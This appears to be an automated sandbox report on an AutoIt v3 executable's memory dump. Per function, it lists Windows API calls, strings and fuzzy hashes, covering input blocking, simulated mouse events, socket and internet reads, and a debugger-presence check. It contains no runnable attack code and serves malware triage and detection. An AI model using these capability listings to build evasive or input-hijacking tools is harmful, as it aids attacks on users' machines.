Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
String ID: *.*
API String ID: 2786137511-438819550
Opcode ID: d77ba936f5c1a081cb2d38ea65046d66a81c4c243dcf601f44b3c732134b8261
Instruction ID: e60742ba66f96e8f2f95967b1f3f979f2867d878b83c0562a3008d73bc01edf9
Opcode Fuzzy Hash: d77ba936f5c1a081cb2d38ea65046d66a81c4c243dcf601f44b3c732134b8261
Instruction Fuzzy Hash: 55417C71A402199FCF54EF68CC89AEEBBB4FF45300F14855AE818E7251D730AE45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00863321, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0086332E
mouse_event.USER32 ref: 00863344
__wcsicoll.LIBCMT ref: 0086335A
mouse_event.USER32 ref: 00863370

Strings

DOWN, xrefs: 00863354

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsicollmouse_event
String ID: DOWN
API String ID: 1033544147-711622031
Opcode ID: 1978310840041c2d602e18804b31a0d7366efc0c6b70e181c9f16841f3546aa6
Instruction ID: 12b4271ca257c7909f0a0ede9d42d3d644cb9853f03ae028282419e1a078f46a
Opcode Fuzzy Hash: 1978310840041c2d602e18804b31a0d7366efc0c6b70e181c9f16841f3546aa6
Instruction Fuzzy Hash: 64F0ED726887243AEC102A983C06EF7338CEB226A3F000151FE0CE2381E95A7D1646F6

Uniqueness

Uniqueness Score: -1.00%

Function 008A65D3, Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00894E62: inet_addr.WSOCK32(?), ref: 00894E86

socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 008A6629
WSAGetLastError.WSOCK32(00000000), ref: 008A664C

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 77abc42a039a7be236d327306991bc6639050e415ab656d397e0ed5a1a8a2505
Instruction ID: 06d33e0351c28db586d8b29be6ea7838728137d51d2941afea458c7507561d3e
Opcode Fuzzy Hash: 77abc42a039a7be236d327306991bc6639050e415ab656d397e0ed5a1a8a2505
Instruction Fuzzy Hash: 3941B0326003006BE720AB6CEC86F5AB7E5FB84720F144655F944EB3C2DAB5A95187D6

Uniqueness

Uniqueness Score: -1.00%

Function 008AA2EA, Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0089F356: IsWindow.USER32(00000000), ref: 0089F386

IsWindowVisible.USER32 ref: 008AA322
IsWindowEnabled.USER32 ref: 008AA332
GetForegroundWindow.USER32(?,?,?,00000001), ref: 008AA33F
IsIconic.USER32 ref: 008AA34D
IsZoomed.USER32 ref: 008AA35B

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 6516514c159dba3341c64b29fbb2e3f48f9b2e2206130d80a12f5a9fc9dbfcb9
Instruction ID: c2a0823844cc12f1c1a88a7e0858621ff127b494db3d0a2bbdbfe86c3b204635
Opcode Fuzzy Hash: 6516514c159dba3341c64b29fbb2e3f48f9b2e2206130d80a12f5a9fc9dbfcb9
Instruction Fuzzy Hash: E9117F327002115BFB20AB6ADC09B5FB7A8FF92711F148529E444D7A41DBB4EC41C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 0084A128, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00851EE1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00851EF6
UnhandledExceptionFilter.KERNEL32(008B43DC), ref: 00851F01
GetCurrentProcess.KERNEL32(C0000409), ref: 00851F1D
TerminateProcess.KERNEL32(00000000), ref: 00851F24

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 3722577c1de6daa2eedcb535f6832f58f1d62f096d928672b6de794275acef45
Instruction ID: b9c3123117a21807c20e2702682c9317d93bb164056c56b9bb99272ced958115
Opcode Fuzzy Hash: 3722577c1de6daa2eedcb535f6832f58f1d62f096d928672b6de794275acef45
Instruction Fuzzy Hash: 1521BBB9819204DFEB90DFA9FD49A447BB4FB08301F44025AFA0A8B771E7B56985CF05

Uniqueness

Uniqueness Score: -1.00%

Function 0089E0F6, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON

Download Yara Rule

APIs

Part of subcall function 00872654: _wcslen.LIBCMT ref: 00872680

CoInitialize.OLE32(00000000), ref: 0089E16E
CoCreateInstance.OLE32(008B2A08,00000000,00000001,008B28A8,?), ref: 0089E187
CoUninitialize.OLE32 ref: 0089E1A6

Strings

.lnk, xrefs: 0089E141, 0089E15E

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: f917754ef58793c964fee5492073408435ead6d372fa9e170d62ab3734837c98
Instruction ID: 03ceb6657666f73876e92e29ebe0771c31bcab06ee43148d2a839cdfc869a2e8
Opcode Fuzzy Hash: f917754ef58793c964fee5492073408435ead6d372fa9e170d62ab3734837c98
Instruction Fuzzy Hash: 81A14975A042019FC714EF68D880A5BBBE9FF88710F188958F995DB351C731EC45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0087F3A6, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0087CF87

Strings

U, xrefs: 0087FAFE
\, xrefs: 0087CFD7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: U$\
API String ID: 4104443479-100911408
Opcode ID: 426575be84e7fd73ee258e7b76879596db8bf01f63505804d4d3425c554a9cd4
Instruction ID: be74631f5030e9c3fde4d97ac8f325c3ff3f8b6cc1960a60c754652d2f344da4
Opcode Fuzzy Hash: 426575be84e7fd73ee258e7b76879596db8bf01f63505804d4d3425c554a9cd4
Instruction Fuzzy Hash: F2029E70A042498FDB28CF69C4906BEBBF2FF85314F24C1ADD55AE724AD7349982CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00872285, Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 008722A5
InternetReadFile.WININET(?,00000000,?,?), ref: 008722DD

Part of subcall function 00872252: GetLastError.KERNEL32 ref: 00872268

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 901099227-0
Opcode ID: ffb118f76374c8b33a91b42c17f828e5ec6f1c5c90bbf9c949f90ab57ad0845a
Instruction ID: 6d3dad0a6ebcb8a9e056b4245b487d8759f71bb4efe3f11913830977fcb7dbbc
Opcode Fuzzy Hash: ffb118f76374c8b33a91b42c17f828e5ec6f1c5c90bbf9c949f90ab57ad0845a
Instruction Fuzzy Hash: C8219571610204BBEB20DE59DC85FAB73ACFF94724F00C02AFA0DDA185D674E5458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0088A35D, Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0088A378

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: df9e4feb56da220a0e24b47b8f7118067e92432b9ab2ebc7e02d4c9d1a6b2650
Instruction ID: 638a74a6098c9a162dc043be6c19bd6817709e1f73ea4853797ced2a0526fda8
Opcode Fuzzy Hash: df9e4feb56da220a0e24b47b8f7118067e92432b9ab2ebc7e02d4c9d1a6b2650
Instruction Fuzzy Hash: C4E04F352003059BD714AF69D84996AB7E8FFA4764F10842AED45D7351DB70E840C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 008894D6, Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00889528
DeleteObject.GDI32(?), ref: 0088953E
DestroyWindow.USER32(?), ref: 00889550
GetDesktopWindow.USER32 ref: 0088956E
GetWindowRect.USER32 ref: 00889575
SetRect.USER32 ref: 0088968B
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00889699
CreateWindowExW.USER32 ref: 008896D5
GetClientRect.USER32 ref: 008896E5
CreateWindowExW.USER32 ref: 00889728
CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0088974D
GetFileSize.KERNEL32(00000000,00000000), ref: 00889768
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00889773
GlobalLock.KERNEL32 ref: 0088977C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0088978B
GlobalUnlock.KERNEL32(00000000), ref: 00889792
CloseHandle.KERNEL32(00000000), ref: 00889799
CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 008897A6
OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,008B29F8,00000000), ref: 008897BD
GlobalFree.KERNEL32 ref: 008897CF
CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 008897FB
SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 0088981E
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00889844
ShowWindow.USER32(?,00000004), ref: 00889852
CreateWindowExW.USER32 ref: 0088989C
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008898B0
GetStockObject.GDI32(00000011), ref: 008898BA
SelectObject.GDI32(00000000,00000000), ref: 008898C2
GetTextFaceW.GDI32(00000000,00000040,?), ref: 008898D2
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008898DB
DeleteDC.GDI32(00000000), ref: 008898E5
_wcslen.LIBCMT ref: 00889903
_wcscpy.LIBCMT ref: 00889927
CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008899C8
SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 008899DC
GetDC.USER32 ref: 008899E9
SelectObject.GDI32(00000000,?), ref: 008899F9
SelectObject.GDI32(00000000,00000007), ref: 00889A24
ReleaseDC.USER32 ref: 00889A2F
MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00889A4C
ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00889A5A

Strings

static, xrefs: 0088971A, 00889895
DISPLAY, xrefs: 008898A8
, xrefs: 008899E2
AutoIt v3, xrefs: 008896CF

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
String ID: $AutoIt v3$DISPLAY$static
API String ID: 4040870279-2373415609
Opcode ID: 2a9ce6a3e207161d00698e59d8871a1670c3673c561ceea5c5f047e4ae9a1483
Instruction ID: 1714537aede84399b66b97d335877e08485c70a4345b9404189e3bf6e86520d4
Opcode Fuzzy Hash: 2a9ce6a3e207161d00698e59d8871a1670c3673c561ceea5c5f047e4ae9a1483
Instruction Fuzzy Hash: 0C026075A00205AFDB14EFA8DC89FAE7BB9FB48700F148658F915EB291D770E901CB64

Uniqueness

Uniqueness Score: -1.00%

Function 008890AA, Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 008890DF
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0088919C
SetRect.USER32 ref: 008891DC
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008891ED
CreateWindowExW.USER32 ref: 0088922F
GetClientRect.USER32 ref: 0088923B
CreateWindowExW.USER32 ref: 0088927D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0088928F
GetStockObject.GDI32(00000011), ref: 00889299
SelectObject.GDI32(00000000,00000000), ref: 008892A1
GetTextFaceW.GDI32(00000000,00000040,?), ref: 008892B1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008892BA
DeleteDC.GDI32(00000000), ref: 008892C3
CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00889309
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00889321
CreateWindowExW.USER32 ref: 0088935B
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0088936F
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00889380
CreateWindowExW.USER32 ref: 008893B5
GetStockObject.GDI32(00000011), ref: 008893C0
SendMessageW.USER32(?,00000030,00000000), ref: 008893D0
ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008893DB

Strings

static, xrefs: 00889276, 008893AE
DISPLAY, xrefs: 00889285
msctls_progress32, xrefs: 00889351
AutoIt v3, xrefs: 00889229

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: a647d5b754550047d0a2e7a8c76c0c6a8bac815d0b203cf308c305dd4bc3dd7a
Instruction ID: abb4dcd208dfcb2315df3e449f1c2a9e698139a04ff9c96e59128b6bb9be5f16
Opcode Fuzzy Hash: a647d5b754550047d0a2e7a8c76c0c6a8bac815d0b203cf308c305dd4bc3dd7a
Instruction Fuzzy Hash: 9BA16075A40205BFEB14DFA8DC8AFAE7779FB44701F148614FB05EB2D1D6B0A9008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00886529, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00886625
GetDesktopWindow.USER32 ref: 0088663A
GetWindowRect.USER32 ref: 00886641
GetWindowLongW.USER32 ref: 00886699
GetWindowLongW.USER32 ref: 008866AC
DestroyWindow.USER32(?), ref: 008866BD
CreateWindowExW.USER32 ref: 0088670B
SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00886729
SendMessageW.USER32(?,00000418,00000000,?), ref: 0088673D
SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 0088674D
SendMessageW.USER32(?,00000421,?,?), ref: 0088676D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00886783
IsWindowVisible.USER32 ref: 008867A3
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 008867BF
SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 008867D3
GetWindowRect.USER32 ref: 008867EA
MonitorFromPoint.USER32(?,00000001,00000002), ref: 00886808
GetMonitorInfoW.USER32 ref: 00886820
CopyRect.USER32 ref: 00886835
SendMessageW.USER32(?,00000412,00000000), ref: 0088688B

Strings

tooltips_class32, xrefs: 00886704
(, xrefs: 00886816
,, xrefs: 008865E3

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
String ID: ($,$tooltips_class32
API String ID: 225202481-3320066284
Opcode ID: 95110d6341d996e6cae5a41e5c8a10d45d04f3dd9c41be25c471026e1f24f6fd
Instruction ID: 44f579c5242df66d88285c57040c63bce6e84de31657fd1a445b844ef8b130f3
Opcode Fuzzy Hash: 95110d6341d996e6cae5a41e5c8a10d45d04f3dd9c41be25c471026e1f24f6fd
Instruction Fuzzy Hash: FAB16E71A00209AFDB14EFA8CC85FAEB7B5FF58300F108558E51AEB281EB74A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00898322, Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 116COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 00898354
__wcsicoll.LIBCMT ref: 0089836C
__wcsnicmp.LIBCMT ref: 0089838C

Strings

ACTIVE, xrefs: 00898366
[CLASS:, xrefs: 008983EA
[ACTIVE, xrefs: 00898378
HANDLE=, xrefs: 00898386
[HANDLE:, xrefs: 00898398
[ALL, xrefs: 0089843E
REGEXP=, xrefs: 008983AF
[LAST, xrefs: 00898445
LAST, xrefs: 0089834E
[REGEXPTITLE:, xrefs: 008983C1
CLASSNAME=, xrefs: 008983D8
ALL, xrefs: 0089842C

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsicoll$__wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 790654849-1810252412
Opcode ID: 4074c5e14d8f8586236716c64f71a4c9c78f150ecd4f4f31d2ecf362e77518bf
Instruction ID: 54e7ffdd722fe65ada12e735027247ef78ff6ecd330f83380d3931efda81af08
Opcode Fuzzy Hash: 4074c5e14d8f8586236716c64f71a4c9c78f150ecd4f4f31d2ecf362e77518bf
Instruction Fuzzy Hash: 69315571A0460AA6DF10FAA8DD83FDE73A8FF51701F540121F950E7391EE25AE0586E7

Uniqueness

Uniqueness Score: -1.00%

Function 008641CD, Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 008641EE
__wcsicoll.LIBCMT ref: 008642A2
LoadIconW.USER32 ref: 008642B8

Strings

stop, xrefs: 00864231
info, xrefs: 0086429C
warning, xrefs: 00864255
question, xrefs: 0086420D
blank, xrefs: 008641E8

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsicoll$IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2485277191-404129466
Opcode ID: 6e0fee1e7d2f9c5ddf142e5cec2d036b99900f063d312544491dcad198e4cbe6
Instruction ID: 3b80f01a466e463a8a1545490e79556cc2f67c7e6a327cd38e6ca7c2ce1c83ee
Opcode Fuzzy Hash: 6e0fee1e7d2f9c5ddf142e5cec2d036b99900f063d312544491dcad198e4cbe6
Instruction Fuzzy Hash: D7216073B4421A66DB119F69BC05FEF3398FB65752F040022F904E2386F369A92492B9

Uniqueness

Uniqueness Score: -1.00%

Function 008845AE, Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 008845C1
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008845D3
SetWindowTextW.USER32(?,?), ref: 008845ED
GetDlgItem.USER32 ref: 00884605
SetWindowTextW.USER32(00000000,?), ref: 0088460C
GetDlgItem.USER32 ref: 0088461D
SetWindowTextW.USER32(00000000,?), ref: 00884624
SendDlgItemMessageW.USER32 ref: 00884646
SendDlgItemMessageW.USER32 ref: 00884660
GetWindowRect.USER32 ref: 0088466A
SetWindowTextW.USER32(?,?), ref: 008846DA
GetDesktopWindow.USER32 ref: 008846E4
GetWindowRect.USER32 ref: 008846EB
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00884739
GetClientRect.USER32 ref: 00884747
PostMessageW.USER32 ref: 00884771
SetTimer.USER32 ref: 008847B4

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 1aa8eb158787f6dfbdcb34247c7c166a6d2ab90d15836fba7ba24122507ba44f
Instruction ID: d8a01763cec036ef97c2aee1b03be0834c917506607c626abbaa85b0e2f2fe13
Opcode Fuzzy Hash: 1aa8eb158787f6dfbdcb34247c7c166a6d2ab90d15836fba7ba24122507ba44f
Instruction Fuzzy Hash: AB612871A00709ABDB24EFA8CD89FABB7B8FB58704F104A18E646D7290D774F944CB50

Uniqueness

Uniqueness Score: -1.00%

